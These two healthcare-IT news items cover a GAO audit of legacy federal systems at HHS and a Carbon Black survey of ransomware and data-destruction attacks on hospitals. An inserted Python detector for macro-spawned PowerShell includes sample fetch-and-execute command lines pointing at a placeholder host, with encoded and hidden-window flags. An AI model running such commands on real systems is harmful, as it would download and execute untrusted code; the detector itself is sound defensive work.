
The Government Accountability Office (GAO) has published the findings of an audit of all federal government systems that run on legacy systems. The aim of the audit was to determine the extent to which legacy software and systems are in use, and which departments are in most critical need of modernization.

In total, 65 federal agency systems were assessed at 24 different agencies to produce a list of the top ten systems in need of modernization. GAO then assessed the agencies’ plans to update their systems and measured those plans against IT modernization best practices.

The Department of Health and Human Services (HHS) was in the top three departments in need of modernization, behind the Department of Education (DoE) and the Department of Defense (DoD). Only three departments were deemed to have both high system criticality and a high security risk: HHS, DoE, and the Department of Homeland Security.

The level of modernization required by HHS is considerable. One legacy system is 50 years old yet is still being extensively used to support clinical and patient administrative activities. GAO was unable to get an accurate gauge of the age of the systems in HHS. That unknown contributed to the high security risk rating.

The HHS is still using systems written in C++ and MUMPS, both of which are legacy languages. One of the problems faced by the HHS is finding programmers who can code in MUMPS, a clear sign that modernization is desperately needed.

The system has been developed to include a further 50 modules and is installed and used on hundreds of computers in many different configurations. The system is invaluable, but cumbersome and difficult to develop and maintain.

GAO notes that the continued use of legacy infrastructure and software invariably involves a greater maintenance cost and the systems are exposed to more cybersecurity risks. Modernization is essential for managing those risks and improving efficiency and the effectiveness of the system.

While there are plans to modernize IT in most government departments, the HHS has yet to document a plan for modernizing IT. “When deciding to modernize a legacy system, [HHS] considers the degree to which core mission functions of the agency or other agencies are dependent on the system.” It is understandable why such an update has been put off.

Until a modernization plan is developed and implemented, which incorporates IT modernization and security best practices, the department “will have an increased risk of cost overruns, schedule delays, and project failure,” wrote GAO.

The HHS has recognized the issues raised by GAO and is keen to update its technical architecture and infrastructure, which continues to present many difficult challenges. A contract has been awarded to a third party to research how the HHS can modernize its systems in stages over the course of a year. Once that report has been received, HHS will develop its modernization plan, which it hopes to implement in 2020.

The HHS has one of the largest IT budgets of any government agency. Modernization has potential to reduce that cost, but GAO noted that the modernization will require a considerable capital investment and it is unclear when and if the modernization will actually lead to cost savings.


A recent report from Carbon Black has revealed that 66% of healthcare organizations have experienced a ransomware attack in the past year and 45% have experienced an attack whose main motivation was data destruction.

The figures come from Carbon Black’s latest report: Healthcare Cyber Heists in 2019. Carbon Black sought input from 20 industry leading CISOs and questioned them about the cyberattacks they had experienced in the past year, the tactics used in the attacks, and how the threat landscape is evolving.

Last year was a record-breaking year for healthcare data breaches and attacks are continuing at an unprecedented level. April 2019 was the worst ever month for healthcare data breaches with 46 major breaches (500+ records) reported to the HHS’ Office for Civil Rights.

“The potential, real-world effect cyberattacks can have on healthcare organizations and patients is substantial,” explained Rick McElroy, Carbon Black’s Head of Security Strategy and co-author of the report. “Cyber attackers have the ability to access, steal and sell patient information on the dark web. Beyond that, they have the ability to shut down a hospital’s access to critical systems and patient records, making effective patient care virtually impossible.”

83% of surveyed CISOs believe there has been an increase in cyberattacks over the past 12 months and 66% of CISOs think attacks have grown in sophistication in the past year.

Two thirds of surveyed organizations have had to deal with an attempted ransomware attack in the past 12 months. A variety of ransomware variants were used although Kryptik/GenKryptik ransomware variants were most common and were used in 74% of attacks.

Almost half of respondents experienced a data destruction attack. These attacks involved the destruction of data in an attempt to paralyze business operations. The attacks are commonly associated with nation-state sponsored hacking groups in Russia, China, and North Korea.

While there were many different methods used to attack healthcare organizations, one of the most common was the use of Excel spreadsheets containing macro-enabled PowerShell to download malware.
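The macro-to-PowerShell download chain described above has a well-known defensive signature: an Office application is the parent process of a PowerShell interpreter whose command line fetches content from the network. The following is an added example (not from the article or Carbon Black's report) that scores constructed process-creation records for that chain. The record fields are modelled loosely on Sysmon Event ID 1 / EDR telemetry, but their names and the scoring weights are assumptions chosen for illustration.

```python
"""Score process-creation events for the Office -> PowerShell download chain.

Added example, not part of the original article. Field names on ProcessEvent
and all scoring weights are assumptions; the sample events are constructed.
"""
import re
from dataclasses import dataclass

# Office binaries that should almost never be the parent of a shell.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Signs that the PowerShell command line pulls content from the network.
DOWNLOAD_PATTERNS = [
    re.compile(r"downloadstring|downloadfile", re.I),
    re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I),
    re.compile(r"start-bitstransfer|bitsadmin", re.I),
    re.compile(r"https?://", re.I),
]
# Flags commonly used to hide or obfuscate the launch; each raises confidence.
EVASION_PATTERNS = [
    re.compile(r"-(enc|encodedcommand|e)\b", re.I),
    re.compile(r"-nop\b|-noprofile", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"bypass", re.I),
]


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process (assumed field)
    image: str          # full path of the created process (assumed field)
    command_line: str   # command line of the created process (assumed field)


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcessEvent):
    """Return (score, reasons). 0 means the event does not match these rules."""
    if basename(ev.image) not in POWERSHELL_IMAGES:
        return 0, []
    score, reasons = 0, []
    if basename(ev.parent_image) in OFFICE_PARENTS:
        score += 50
        reasons.append(f"PowerShell spawned by {basename(ev.parent_image)}")
    if any(p.search(ev.command_line) for p in DOWNLOAD_PATTERNS):
        score += 30
        reasons.append("download cmdlet or URL in command line")
    hits = sum(1 for p in EVASION_PATTERNS if p.search(ev.command_line))
    if hits:
        score += 10 * hits
        reasons.append(f"{hits} evasion flag(s)")
    return score, reasons


def detect(events, threshold: int = 70):
    """Events whose score reaches the alerting threshold, with their reasons."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append((ev, score, reasons))
    return flagged


# Constructed sample telemetry; example.invalid is a reserved, non-routable name.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoP -W Hidden -Exec Bypass -Enc SQBFAFgA"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -Command Get-Date"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/x')\""),
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"iwr http://example.invalid/a\""),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for ev, score, reasons in detect(SAMPLE_EVENTS):
        print(f"{score:3d} {basename(ev.parent_image)} -> {basename(ev.image)}: "
              + "; ".join(reasons))
```

The parent/child relationship carries most of the weight because a macro launching PowerShell is rare in legitimate use, while download cmdlets and hidden-window flags alone also appear in administrative scripts; the fourth sample event (a non-Office parent with a download and evasion flags) therefore scores below the threshold and would be a lower-severity signal rather than an alert. In production the same logic would run over Sysmon or EDR process-creation events, and the Office-parent rule can be complemented by blocking macros from the internet zone.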

One third of CISOs said they had experienced an ‘island hopping’ attack in the past year. This is where hackers have compromised a third party and used it to attack their organization, for example via partner-provisioned Virtual Desktop Infrastructure access, VPNs, or private network links. One third of CISOs also said counter-incident-response tactics were used by the hackers to prevent mitigation of a breach and to try to maintain persistent access.

CISOs were also asked about their biggest concerns. Compliance was the most stated area of concern (33%) followed by budget restrictions (22%), loss of patient data (16%), and vulnerable devices (16%).

Compliance as the main concern is worrying. It suggests healthcare organizations believe that becoming compliant with HIPAA equates to robust cybersecurity, when that is not the case. Compliance with HIPAA only means an organization has achieved a baseline level of security. Many healthcare organizations that were HIPAA-compliant have still experienced data breaches. It is important for compliance to be viewed as a starting point in an organization’s security program. Once HIPAA compliant, security programs must be developed further.

The report shows organizations have realized the importance of staff security awareness training, not just for compliance but for improving security posture. 84% of organizations provide staff security awareness training at least annually with 45% providing more frequent training sessions.

When asked to rate their security posture, most CISOs believed there was still considerable room for improvement. 74% gave their organization a B or less (25% B, 16% B-, 33% C).

While the majority of organizations that engage in threat hunting say that it has significantly improved their cybersecurity posture, only one third of respondents said they had a threat hunting team. Carbon Black notes that threat hunting is no longer reserved for the security elite. Threat hunting software is available to help businesses of all sizes gain better visibility and find and address threats before they result in a data breach.
